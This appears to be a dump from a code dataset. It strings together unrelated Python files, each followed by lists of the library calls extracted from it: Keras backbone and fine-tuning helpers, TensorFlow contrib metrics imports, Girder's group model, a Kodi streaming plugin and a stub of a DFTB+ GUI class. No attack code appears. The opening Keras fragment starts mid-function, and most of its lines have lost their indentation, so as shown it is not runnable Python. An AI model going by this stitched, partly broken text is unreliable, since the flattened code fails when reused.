from tensorflow.keras.applications.resnet_v2 import ResNet101V2 as TFModel
from tensorflow.keras.applications.resnet_v2 import preprocess_input
elif backbone == "vgg16":
from tensorflow.keras.applications.vgg16 import VGG16 as TFModel
from tensorflow.keras.applications.vgg16 import preprocess_input
elif backbone == "efficientnetb0":
from tensorflow.keras.applications.efficientnet import EfficientNetB0 as TFModel
from tensorflow.keras.applications.efficientnet import preprocess_input
elif backbone == "efficientnetb7":
from tensorflow.keras.applications.efficientnet import EfficientNetB7 as TFModel
from tensorflow.keras.applications.efficientnet import preprocess_input
else:
raise ValueError(f"Unknown backbone: {backbone}")
if ignore_model:
model = None
else:
# Instantiate base model with pre-trained weights
base_model = TFModel(input_shape=(*target_size, 3), include_top=False, weights="imagenet")
# Freeze base model
# base_model.trainable = istrainable
for layers in base_model.layers:
layers.trainable = istrainable
# Create a new model on top
inputs = base_model.input
x = base_model(inputs)
# Option A
x = tf.keras.layers.GlobalAveragePooling2D(name='avg_pool')(x)
# Option B
# x = tf.keras.layers.Flatten(name='flatten')(x)
# x = tf.keras.layers.Dense(512, activation='relu', name='fc1')(x)
# x = tf.keras.layers.Dense(512, activation='relu', name='fc2')(x)
# Outputs
outputs = tf.keras.layers.Dense(classes, activation="sigmoid", name='predictions')(x)
model = tf.keras.Model(inputs, outputs)
return model, preprocess_input
def add_tabular_input(model, classes):
# Input1
input1 = model.input
input2 = tf.keras.layers.Input(shape=(2,), name="input_2b")
# Pre-outputs 1x3 + 1x3
output1 = model.output
output2 = tf.keras.layers.Dense(classes, activation="sigmoid", name='output_tab')(input2)
# Outputs
x = tf.keras.layers.Concatenate(axis=1)([output1, output2])
output = tf.keras.layers.Dense(classes, activation="sigmoid", name='final_predictions')(x)
model = tf.keras.Model([input1, input2], output)
return model
def unfreeze_base_model(model, n=None, unfreeze=True):
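    # `n` selects how many trailing backbone layers to unfreeze: an int is an
    # absolute count, a float in (0, 1] a fraction of all layers, and None
    # unfreezes every layer. BatchNormalization layers always stay frozen.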
base_model = model.layers[1].layers
# Select number of layers to unfreeze
idx = 0
if n is not None:
if isinstance(n, int):
idx = n
            print(f"Unfreezing {idx} layers")
elif isinstance(n, float) and 0.0 < n <= 1.0:
idx = int(len(base_model) * n)
print(f"Unfreezing {idx} layers")
else:
raise ValueError("Invalid number of layers")
# We unfreeze all layers but BatchNorm (to not destroy the non-trainable weights)
for layer in base_model[-idx:]:
if not isinstance(layer, tf.keras.layers.BatchNormalization):
layer.trainable = True
| [
"tensorflow.keras.metrics.BinaryAccuracy",
"tensorflow.keras.layers.Input",
"tensorflow.keras.applications.efficientnet.EfficientNetB7",
"tensorflow.keras.layers.Concatenate",
"tensorflow.keras.losses.BinaryCrossentropy",
"tensorflow.keras.metrics.Precision",
"tensorflow.keras.layers.Dense",
"tensorflow.keras.metrics.AUC",
"tensorflow.keras.Model",
"tensorflow.keras.metrics.Recall",
"tensorflow.keras.layers.GlobalAveragePooling2D",
"tensorflow.keras.metrics.binary_accuracy"
]
| [((103, 163), 'tensorflow.keras.metrics.binary_accuracy', 'tf.keras.metrics.binary_accuracy', (['y_true[:, i]', 'y_pred[:, i]'], {}), '(y_true[:, i], y_pred[:, i])\n', (135, 163), True, 'import tensorflow as tf\n'), ((241, 301), 'tensorflow.keras.metrics.binary_accuracy', 'tf.keras.metrics.binary_accuracy', (['y_true[:, i]', 'y_pred[:, i]'], {}), '(y_true[:, i], y_pred[:, i])\n', (273, 301), True, 'import tensorflow as tf\n'), ((377, 437), 'tensorflow.keras.metrics.binary_accuracy', 'tf.keras.metrics.binary_accuracy', (['y_true[:, i]', 'y_pred[:, i]'], {}), '(y_true[:, i], y_pred[:, i])\n', (409, 437), True, 'import tensorflow as tf\n'), ((512, 572), 'tensorflow.keras.metrics.binary_accuracy', 'tf.keras.metrics.binary_accuracy', (['y_true[:, i]', 'y_pred[:, i]'], {}), '(y_true[:, i], y_pred[:, i])\n', (544, 572), True, 'import tensorflow as tf\n'), ((4929, 4979), 'tensorflow.keras.layers.Input', 'tf.keras.layers.Input', ([], {'shape': '(2,)', 'name': '"""input_2b"""'}), "(shape=(2,), name='input_2b')\n", (4950, 4979), True, 'import tensorflow as tf\n'), ((5316, 5356), 'tensorflow.keras.Model', 'tf.keras.Model', (['[input1, input2]', 'output'], {}), '([input1, input2], output)\n', (5330, 5356), True, 'import tensorflow as tf\n'), ((1664, 1700), 'tensorflow.keras.losses.BinaryCrossentropy', 'tf.keras.losses.BinaryCrossentropy', ([], {}), '()\n', (1698, 1700), True, 'import tensorflow as tf\n'), ((3984, 4061), 'tensorflow.keras.applications.efficientnet.EfficientNetB7', 'TFModel', ([], {'input_shape': '(*target_size, 3)', 'include_top': '(False)', 'weights': '"""imagenet"""'}), "(input_shape=(*target_size, 3), include_top=False, weights='imagenet')\n", (3991, 4061), True, 'from tensorflow.keras.applications.efficientnet import EfficientNetB7 as TFModel\n'), ((4769, 4800), 'tensorflow.keras.Model', 'tf.keras.Model', (['inputs', 'outputs'], {}), '(inputs, outputs)\n', (4783, 4800), True, 'import tensorflow as tf\n'), ((5050, 5121), 'tensorflow.keras.layers.Dense', 'tf.keras.layers.Dense', (['classes'], {'activation': '"""sigmoid"""', 'name': '"""output_tab"""'}), "(classes, activation='sigmoid', name='output_tab')\n", (5071, 5121), True, 'import tensorflow as tf\n'), ((5153, 5188), 'tensorflow.keras.layers.Concatenate', 'tf.keras.layers.Concatenate', ([], {'axis': '(1)'}), '(axis=1)\n', (5180, 5188), True, 'import tensorflow as tf\n'), ((5222, 5300), 'tensorflow.keras.layers.Dense', 'tf.keras.layers.Dense', (['classes'], {'activation': '"""sigmoid"""', 'name': '"""final_predictions"""'}), "(classes, activation='sigmoid', name='final_predictions')\n", (5243, 5300), True, 'import tensorflow as tf\n'), ((2275, 2308), 'tensorflow.keras.metrics.BinaryAccuracy', 'tf.keras.metrics.BinaryAccuracy', ([], {}), '()\n', (2306, 2308), True, 'import tensorflow as tf\n'), ((2322, 2344), 'tensorflow.keras.metrics.AUC', 'tf.keras.metrics.AUC', ([], {}), '()\n', (2342, 2344), True, 'import tensorflow as tf\n'), ((2358, 2386), 'tensorflow.keras.metrics.Precision', 'tf.keras.metrics.Precision', ([], {}), '()\n', (2384, 2386), True, 'import tensorflow as tf\n'), ((2400, 2425), 'tensorflow.keras.metrics.Recall', 'tf.keras.metrics.Recall', ([], {}), '()\n', (2423, 2425), True, 'import tensorflow as tf\n'), ((4354, 4409), 'tensorflow.keras.layers.GlobalAveragePooling2D', 'tf.keras.layers.GlobalAveragePooling2D', ([], {'name': '"""avg_pool"""'}), "(name='avg_pool')\n", (4392, 4409), True, 'import tensorflow as tf\n'), ((4677, 4749), 'tensorflow.keras.layers.Dense', 'tf.keras.layers.Dense', (['classes'], 
{'activation': '"""sigmoid"""', 'name': '"""predictions"""'}), "(classes, activation='sigmoid', name='predictions')\n", (4698, 4749), True, 'import tensorflow as tf\n')] |
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Ops for evaluation metrics and summary statistics.
See the @{$python/contrib.metrics} guide.
@@streaming_accuracy
@@streaming_mean
@@streaming_recall
@@streaming_recall_at_thresholds
@@streaming_precision
@@streaming_precision_at_thresholds
@@streaming_auc
@@streaming_curve_points
@@streaming_recall_at_k
@@streaming_mean_absolute_error
@@streaming_mean_iou
@@streaming_mean_relative_error
@@streaming_mean_squared_error
@@streaming_mean_tensor
@@streaming_root_mean_squared_error
@@streaming_covariance
@@streaming_pearson_correlation
@@streaming_mean_cosine_distance
@@streaming_percentage_less
@@streaming_sensitivity_at_specificity
@@streaming_sparse_average_precision_at_k
@@streaming_sparse_average_precision_at_top_k
@@streaming_sparse_precision_at_k
@@streaming_sparse_precision_at_top_k
@@streaming_sparse_recall_at_k
@@streaming_specificity_at_sensitivity
@@streaming_concat
@@streaming_false_negatives
@@streaming_false_negatives_at_thresholds
@@streaming_false_positives
@@streaming_false_positives_at_thresholds
@@streaming_true_negatives
@@streaming_true_negatives_at_thresholds
@@streaming_true_positives
@@streaming_true_positives_at_thresholds
@@auc_using_histogram
@@accuracy
@@aggregate_metrics
@@aggregate_metric_map
@@confusion_matrix
@@set_difference
@@set_intersection
@@set_size
@@set_union
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# pylint: disable=unused-import,line-too-long,g-importing-member,wildcard-import
from tensorflow.contrib.metrics.python.metrics import *
# pylint: enable=wildcard-import
from tensorflow.contrib.metrics.python.ops.confusion_matrix_ops import confusion_matrix
from tensorflow.contrib.metrics.python.ops.histogram_ops import auc_using_histogram
from tensorflow.contrib.metrics.python.ops.metric_ops import aggregate_metric_map
from tensorflow.contrib.metrics.python.ops.metric_ops import aggregate_metrics
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_accuracy
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_auc
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_concat
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_covariance
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_curve_points
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_false_negatives
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_false_negatives_at_thresholds
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_false_positives
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_false_positives_at_thresholds
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_mean
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_mean_absolute_error
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_mean_cosine_distance
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_mean_iou
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_mean_relative_error
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_mean_squared_error
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_mean_tensor
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_pearson_correlation
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_percentage_less
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_precision
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_precision_at_thresholds
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_recall
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_recall_at_k
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_recall_at_thresholds
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_root_mean_squared_error
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_sensitivity_at_specificity
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_sparse_average_precision_at_k
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_sparse_average_precision_at_top_k
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_sparse_precision_at_k
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_sparse_precision_at_top_k
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_sparse_recall_at_k
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_specificity_at_sensitivity
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_true_negatives
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_true_negatives_at_thresholds
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_true_positives
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_true_positives_at_thresholds
from tensorflow.contrib.metrics.python.ops.set_ops import set_difference
from tensorflow.contrib.metrics.python.ops.set_ops import set_intersection
from tensorflow.contrib.metrics.python.ops.set_ops import set_size
from tensorflow.contrib.metrics.python.ops.set_ops import set_union
# pylint: enable=unused-import,line-too-long
from tensorflow.python.util.all_util import remove_undocumented
remove_undocumented(__name__)
| [
"tensorflow.python.util.all_util.remove_undocumented"
]
| [((6155, 6184), 'tensorflow.python.util.all_util.remove_undocumented', 'remove_undocumented', (['__name__'], {}), '(__name__)\n', (6174, 6184), False, 'from tensorflow.python.util.all_util import remove_undocumented\n')] |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
###############################################################################
# Copyright 2013 Kitware Inc.
#
# Licensed under the Apache License, Version 2.0 ( the "License" );
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
###############################################################################
import datetime
from .model_base import AccessControlledModel,\
ValidationException,\
AccessException
from girder.constants import AccessType
class Group(AccessControlledModel):
"""
Groups are simply groups of users. The primary use of grouping users is
to simplify access control for resources in the system, but they can
be used for other purposes that require groupings of users as well.
Group membership is stored in the database on the user document only;
there is no "users" field in this model. This is to optimize for the most
common use case for querying membership, which involves checking access
control policies, which is always done relative to a specific user. The
task of querying all members within a group is much less common and
    typically only performed on a single group at a time, so doing a find on the
indexed group list in the user collection is sufficiently fast.
Users with READ access on the group can see the group and its members.
Users with WRITE access on the group can add and remove members and
change the name or description.
Users with ADMIN access can delete the entire group.
"""
def initialize(self):
self.name = 'group'
self.ensureIndices(['lowerName'])
self.ensureTextIndex({
'name': 10,
'description': 1
})
def validate(self, doc):
doc['name'] = doc['name'].strip()
doc['lowerName'] = doc['name'].lower()
doc['description'] = doc['description'].strip()
if not doc['name']:
raise ValidationException('Group name must not be empty.', 'name')
q = {
'lowerName': doc['lowerName'],
}
if '_id' in doc:
q['_id'] = {'$ne': doc['_id']}
duplicates = self.find(q, limit=1, fields=['_id'])
if duplicates.count() != 0:
            raise ValidationException('A group with that name already '
                                      'exists.', 'name')
return doc
def list(self, user=None, limit=50, offset=0, sort=None):
"""
Search for groups or simply list all visible groups.
:param user: The user to search as.
:param limit: Result set size limit.
:param offset: Offset into the results.
:param sort: The sort direction.
"""
# Perform the find; we'll do access-based filtering of the result
# set afterward.
cursor = self.find({}, limit=0, sort=sort)
for r in self.filterResultsByPermission(cursor=cursor, user=user,
level=AccessType.READ,
limit=limit, offset=offset):
yield r
def remove(self, group):
"""
Delete a group, and all references to it in the database.
:param group: The group document to delete.
:type group: dict
"""
# Remove references to this group from user group membership lists
self.model('user').update({
'groups': group['_id']
}, {
'$pull': {'groups': group['_id']}
})
acQuery = {
'access.groups.id': group['_id']
}
acUpdate = {
'$pull': {
'access.groups': {'id': group['_id']}
}
}
# Remove references to this group from access-controlled collections.
self.update(acQuery, acUpdate)
self.model('collection').update(acQuery, acUpdate)
self.model('folder').update(acQuery, acUpdate)
self.model('user').update(acQuery, acUpdate)
# Finally, delete the document itself
AccessControlledModel.remove(self, group)
def getMembers(self, group, offset=0, limit=50, sort=None):
"""
Return the list of all users who belong to this group.
:param group: The group to list members on.
:param offset: Offset into the result set of users.
:param limit: Result set size limit.
:param sort: Sort parameter for the find query.
:returns: List of user documents.
"""
q = {
'groups': group['_id']
}
cursor = self.model('user').find(
q, offset=offset, limit=limit, sort=sort)
users = []
for user in cursor:
users.append(user)
return users
def addUser(self, group, user, level=AccessType.READ):
"""
Add the user to the group. Records membership in the group in the
user document, and also grants the specified access level on the
group itself to the user. Any group member has at least read access on
the group.
"""
        if 'groups' not in user:
user['groups'] = []
if not group['_id'] in user['groups']:
user['groups'].append(group['_id'])
self.model('user').save(user, validate=False)
self.setUserAccess(group, user, level, save=True)
return group
def joinGroup(self, group, user):
"""
Call this when the user accepts an invitation.
"""
        if 'groupInvites' not in user:
user['groupInvites'] = []
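        # for/else: accept the matching invitation, or raise if the user was
        # never actually invited to this group.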
for invite in user['groupInvites']:
if invite['groupId'] == group['_id']:
self.addUser(group, user, level=invite['level'])
user['groupInvites'].remove(invite)
self.model('user').save(user, validate=False)
break
else:
raise AccessException('User was not invited to this group.')
return group
def inviteUser(self, group, user, level=AccessType.READ):
"""
Invite a user to join the group. Inviting them automatically
grants the user read access to the group so that they can see it.
Once they accept the invitation, they will be given the specified level
of access.
"""
# User has to be able to see the group to join it
self.setUserAccess(group, user, AccessType.READ, save=True)
if group['_id'] in user.get('groups', []):
raise ValidationException('User is already in this group.')
        if 'groupInvites' not in user:
user['groupInvites'] = []
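        # Update the level of an existing invitation if present; otherwise
        # record a brand new invitation on the user document.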
for invite in user['groupInvites']:
if invite['groupId'] == group['_id']:
invite['level'] = level
break
else:
user['groupInvites'].append({
'groupId': group['_id'],
'level': level
})
return self.model('user').save(user, validate=False)
def removeUser(self, group, user):
"""
Remove the user from the group.
"""
# Remove group membership for this user.
if 'groups' in user and group['_id'] in user['groups']:
user['groups'].remove(group['_id'])
self.model('user').save(user, validate=False)
# Remove all group access for this user on this group.
self.setUserAccess(group, user, level=None, save=True)
return group
def createGroup(self, name, creator, description='', public=True):
"""
Create a new group. The creator will be given admin access to it.
        :param name: The name of the group.
        :type name: str
        :param description: Description for the group.
:type description: str
:param public: Whether the group is publicly visible.
:type public: bool
:param creator: User document representing the creator of the group.
:type creator: dict
:returns: The group document that was created.
"""
assert type(public) is bool
now = datetime.datetime.now()
group = {
'name': name,
'description': description,
'created': now,
'updated': now
}
self.setPublic(group, public=public)
# Now validate and save the group
self.save(group)
# We make the creator a member of this group and also grant them
# admin access over the group.
self.addUser(group, creator, level=AccessType.ADMIN)
return group
| [
"datetime.datetime.now"
]
| [((8645, 8668), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (8666, 8668), False, 'import datetime\n')] |
# -*- coding: utf-8 -*-
import sys
import urllib
import urlparse
# import xbmc
import xbmcgui
import xbmcplugin
import aci
# Get the plugin url in plugin:// notation.
_url = sys.argv[0]
# Get the plugin handle as an integer number.
_handle = int(sys.argv[1])
# Get an instance of ACI.
ATV = aci.ACI()
ATV.load_aci()
# Encode user agent headers for video.
user_agent_headers = urllib.urlencode({'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 '
'Firefox/47.0 FirePHP/0.7.4',
                                  'X-Requested-With': 'ShockwaveFlash/22.0.0.192'
})
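# Kodi accepts HTTP headers appended to a stream URL after a '|' separator;
# these encoded headers are attached to each video URL before playback.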
def get_url(**kwargs):
"""
Create a URL for calling the plugin recursively from the given set of keyword arguments.
:param kwargs: "argument=value" pairs
:type kwargs: dict
:return: plugin call URL
:rtype: str
"""
return '{0}?{1}'.format(_url, urllib.urlencode(kwargs))
def get_categories():
"""
Get the list of video categories.
Here you can insert some parsing code that retrieves
the list of video categories (e.g. 'Movies', 'TV-shows', 'Documentaries' etc.)
from some site or server.
.. note:: Consider using `generator functions <https://wiki.python.org/moin/Generators>`_
instead of returning lists.
:return: The list of video categories
:rtype: types.GeneratorType
"""
return ATV.aci.iterkeys()
def get_videos(category):
"""
Get the list of video files/streams.
Here you can insert some parsing code that retrieves
the list of video streams in the given category from some site or server.
    .. note:: Consider using `generator functions <https://wiki.python.org/moin/Generators>`_
instead of returning lists.
:param category: Category name
:type category: str
:return: the list of videos in the category
:rtype: list
"""
return ATV.aci[category]
def list_categories():
"""
Create the list of video categories in the Kodi interface.
"""
# Set plugin category. It is displayed in some skins as the name
# of the current section.
xbmcplugin.setPluginCategory(_handle, 'ACI')
# Set plugin content. It allows Kodi to select appropriate views
# for this type of content.
xbmcplugin.setContent(_handle, 'videos')
# Get video categories
categories = get_categories()
# Iterate through categories
for category in categories:
# xbmc.log(category.encode("utf-8"), xbmc.LOGNOTICE)
# Create a list item with a text label and a thumbnail image.
list_item = xbmcgui.ListItem(label=category.title())
# Set graphics (thumbnail, fanart, banner, poster, landscape etc.) for the list item.
# Here we use the same image for all items for simplicity's sake.
# In a real-life plugin you need to set each image accordingly.
list_item.setArt({'thumb': "icon.png",
'icon': "icon.png",
'fanart': "icon.png"})
# Set additional info for the list item.
        # Here we use a category name for both properties for simplicity's sake.
        # setInfo allows you to set various information for an item.
# For available properties see the following link:
# https://codedocs.xyz/xbmc/xbmc/group__python__xbmcgui__listitem.html#ga0b71166869bda87ad744942888fb5f14
# 'mediatype' is needed for a skin to display info for this ListItem correctly.
list_item.setInfo('video', {'title': category.title(),
'genre': category.title(),
'mediatype': 'video'})
# Create a URL for a plugin recursive call.
# Example: plugin://plugin.video.example/?action=listing&category=[category name]
url = get_url(action="listing", category=category)
# is_folder = True means that this item opens a sub-list of lower level items.
is_folder = True
# Add our item to the Kodi virtual folder listing.
xbmcplugin.addDirectoryItem(_handle, url, list_item, is_folder)
# Add a sort method for the virtual folder items (alphabetically, ignore articles)
xbmcplugin.addSortMethod(_handle, xbmcplugin.SORT_METHOD_LABEL_IGNORE_THE)
# Finish creating a virtual folder.
xbmcplugin.endOfDirectory(_handle)
def list_videos(category):
"""
Create the list of playable videos in the Kodi interface.
:param category: Category name
:type category: str
"""
# Set plugin category. It is displayed in some skins as the name
# of the current section.
xbmcplugin.setPluginCategory(_handle, category)
# Set plugin content. It allows Kodi to select appropriate views
# for this type of content.
xbmcplugin.setContent(_handle, 'videos')
# Get the list of videos in the category.
videos = get_videos(category)
# Iterate through each video.
for video_id in videos:
# Get the video item to process.
video_item = videos[video_id]
# Create a list item with a text label and a thumbnail image.
list_item = xbmcgui.ListItem(label=video_item["title"])
# Set additional info for the list item.
# 'mediatype' is needed for skin to display info for this ListItem correctly.
list_item.setInfo('video', {'title': video_item["title"],
'genre': category.title(),
'mediatype': 'video'})
# Set graphics (thumbnail, fanart, banner, poster, landscape etc.) for the list item.
# Here we use the same image for all items for simplicity's sake.
# In a real-life plugin you need to set each image accordingly.
list_item.setArt({'thumb': video_item["thumbnail"],
'icon': video_item["thumbnail"],
'fanart': video_item["thumbnail"]
})
# Set 'IsPlayable' property to 'true'.
# This is mandatory for playable items!
list_item.setProperty('IsPlayable', 'true')
referer_header = urllib.urlencode({"Referer": video_item["location"]})
video_item['url'] += '|%s&%s' % (user_agent_headers, referer_header)
# Create a URL for a plugin recursive call.
# Example: plugin://plugin.video.example/?action=play&
# video=[video url]
url = get_url(action='play', video=video_item['url'])
# video_url = 'plugin://plugin.video.f4mTester/?url=' + urllib.quote_plus(video['video']) + \
# '&streamtype=HLSRETRY&name=' + urllib.quote_plus(video['name']) + \
# '&|User-Agent=Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0 ' \
# 'FirePHP/0.7.4&X-Requested-With=ShockwaveFlash/22.0.0.192&Referer=' + \
# urllib.quote_plus(video['reference'])
# url = get_url(action='play', video=video_url)
# Add the list item to a virtual Kodi folder.
# is_folder = False means that this item won't open any sub-list.
is_folder = False
# Add our item to the Kodi virtual folder listing.
xbmcplugin.addDirectoryItem(_handle, url, list_item, is_folder)
# Add a sort method for the virtual folder items (alphabetically, ignore articles)
xbmcplugin.addSortMethod(_handle, xbmcplugin.SORT_METHOD_LABEL_IGNORE_THE)
# Finish creating a virtual folder.
xbmcplugin.endOfDirectory(_handle)
def play_video(path):
"""
Play a video by the provided path.
:param path: Fully-qualified video URL
:type path: str
"""
# Create a playable item with a path to play.
play_item = xbmcgui.ListItem(path=path)
# Play with inputstream addon.
play_item.setProperty('inputstreamaddon', 'inputstream.adaptive')
play_item.setProperty('inputstream.adaptive.manifest_type', 'hls')
# Pass the item to the Kodi player.
xbmcplugin.setResolvedUrl(_handle, True, listitem=play_item)
def router(paramstring):
"""
Router function that calls other functions
depending on the provided paramstring
:param paramstring: URL encoded plugin paramstring
:type paramstring: str
"""
# Parse a URL-encoded paramstring to the dictionary of
# {<parameter>: <value>} elements
params = dict(urlparse.parse_qsl(paramstring))
# Check the parameters passed to the plugin
if params:
if params['action'] == 'listing':
# Load the videos for aci.
if params['category'] == "shows":
ATV.update_aci_shows()
print("Updated from main shows.")
elif params['category'] == "cable":
ATV.update_aci_cable()
print("Updated from main cable.")
elif params['category'] == "movies":
ATV.update_aci_movies()
print("Updated from main movies.")
# Display the list of videos in a provided category.
list_videos(params['category'])
elif params['action'] == 'play':
# Play a video from a provided URL.
play_video(params['video'])
else:
# If the provided paramstring does not contain a supported action
# we raise an exception. This helps to catch coding errors,
# e.g. typos in action names.
raise ValueError('Invalid paramstring: {0}!'.format(paramstring))
else:
# Load ATV.
ATV.load_aci()
# If the plugin is called from Kodi UI without any parameters,
# display the list of video categories
list_categories()
if __name__ == '__main__':
# Call the router function and pass the plugin call parameters to it.
# We use string slicing to trim the leading '?' from the plugin call paramstring
router(sys.argv[2][1:])
| [
"xbmcplugin.setContent",
"xbmcplugin.setResolvedUrl",
"xbmcplugin.addDirectoryItem",
"urllib.urlencode",
"xbmcgui.ListItem",
"urlparse.parse_qsl",
"xbmcplugin.setPluginCategory",
"xbmcplugin.endOfDirectory",
"xbmcplugin.addSortMethod",
"aci.ACI"
]
| [((296, 305), 'aci.ACI', 'aci.ACI', ([], {}), '()\n', (303, 305), False, 'import aci\n'), ((382, 566), 'urllib.urlencode', 'urllib.urlencode', (["{'User-Agent':\n 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0 FirePHP/0.7.4'\n , 'X-Requested-With': 'ShockwaveFlash/2172.16.17.32'}"], {}), "({'User-Agent':\n 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0 FirePHP/0.7.4'\n , 'X-Requested-With': 'ShockwaveFlash/2172.16.17.32'})\n", (398, 566), False, 'import urllib\n'), ((2197, 2241), 'xbmcplugin.setPluginCategory', 'xbmcplugin.setPluginCategory', (['_handle', '"""ACI"""'], {}), "(_handle, 'ACI')\n", (2225, 2241), False, 'import xbmcplugin\n'), ((2347, 2387), 'xbmcplugin.setContent', 'xbmcplugin.setContent', (['_handle', '"""videos"""'], {}), "(_handle, 'videos')\n", (2368, 2387), False, 'import xbmcplugin\n'), ((4275, 4349), 'xbmcplugin.addSortMethod', 'xbmcplugin.addSortMethod', (['_handle', 'xbmcplugin.SORT_METHOD_LABEL_IGNORE_THE'], {}), '(_handle, xbmcplugin.SORT_METHOD_LABEL_IGNORE_THE)\n', (4299, 4349), False, 'import xbmcplugin\n'), ((4394, 4428), 'xbmcplugin.endOfDirectory', 'xbmcplugin.endOfDirectory', (['_handle'], {}), '(_handle)\n', (4419, 4428), False, 'import xbmcplugin\n'), ((4699, 4746), 'xbmcplugin.setPluginCategory', 'xbmcplugin.setPluginCategory', (['_handle', 'category'], {}), '(_handle, category)\n', (4727, 4746), False, 'import xbmcplugin\n'), ((4852, 4892), 'xbmcplugin.setContent', 'xbmcplugin.setContent', (['_handle', '"""videos"""'], {}), "(_handle, 'videos')\n", (4873, 4892), False, 'import xbmcplugin\n'), ((7472, 7546), 'xbmcplugin.addSortMethod', 'xbmcplugin.addSortMethod', (['_handle', 'xbmcplugin.SORT_METHOD_LABEL_IGNORE_THE'], {}), '(_handle, xbmcplugin.SORT_METHOD_LABEL_IGNORE_THE)\n', (7496, 7546), False, 'import xbmcplugin\n'), ((7591, 7625), 'xbmcplugin.endOfDirectory', 'xbmcplugin.endOfDirectory', (['_handle'], {}), '(_handle)\n', (7616, 7625), False, 'import xbmcplugin\n'), ((7835, 7862), 'xbmcgui.ListItem', 'xbmcgui.ListItem', ([], {'path': 'path'}), '(path=path)\n', (7851, 7862), False, 'import xbmcgui\n'), ((8085, 8145), 'xbmcplugin.setResolvedUrl', 'xbmcplugin.setResolvedUrl', (['_handle', '(True)'], {'listitem': 'play_item'}), '(_handle, True, listitem=play_item)\n', (8110, 8145), False, 'import xbmcplugin\n'), ((972, 996), 'urllib.urlencode', 'urllib.urlencode', (['kwargs'], {}), '(kwargs)\n', (988, 996), False, 'import urllib\n'), ((4119, 4182), 'xbmcplugin.addDirectoryItem', 'xbmcplugin.addDirectoryItem', (['_handle', 'url', 'list_item', 'is_folder'], {}), '(_handle, url, list_item, is_folder)\n', (4146, 4182), False, 'import xbmcplugin\n'), ((5206, 5249), 'xbmcgui.ListItem', 'xbmcgui.ListItem', ([], {'label': "video_item['title']"}), "(label=video_item['title'])\n", (5222, 5249), False, 'import xbmcgui\n'), ((6197, 6250), 'urllib.urlencode', 'urllib.urlencode', (["{'Referer': video_item['location']}"], {}), "({'Referer': video_item['location']})\n", (6213, 6250), False, 'import urllib\n'), ((7316, 7379), 'xbmcplugin.addDirectoryItem', 'xbmcplugin.addDirectoryItem', (['_handle', 'url', 'list_item', 'is_folder'], {}), '(_handle, url, list_item, is_folder)\n', (7343, 7379), False, 'import xbmcplugin\n'), ((8476, 8507), 'urlparse.parse_qsl', 'urlparse.parse_qsl', (['paramstring'], {}), '(paramstring)\n', (8494, 8507), False, 'import urlparse\n')] |
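# Usage sketch of the plugin URL round trip the router above depends on: get_url()
# urlencodes keyword arguments into the plugin:// URL and router() recovers them with
# urlparse.parse_qsl(). _URL and _example_get_url are illustrative stand-ins (in Kodi
# the base URL comes from sys.argv[0]); Python 2 stdlib to match the module above.
import urllib
import urlparse

_URL = 'plugin://plugin.video.example/'

def _example_get_url(**kwargs):
    return '{0}?{1}'.format(_URL, urllib.urlencode(kwargs))

url = _example_get_url(action='play', video='http://host/stream.m3u8')
params = dict(urlparse.parse_qsl(url.split('?', 1)[1]))
assert params == {'action': 'play', 'video': 'http://host/stream.m3u8'}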
# -*- coding: utf-8 -*-
"""The graphical part of a DFTB+ Optimization node"""
import logging
import tkinter as tk
import tkinter.ttk as ttk
import dftbplus_step
logger = logging.getLogger(__name__)
class TkOptimization(dftbplus_step.TkEnergy):
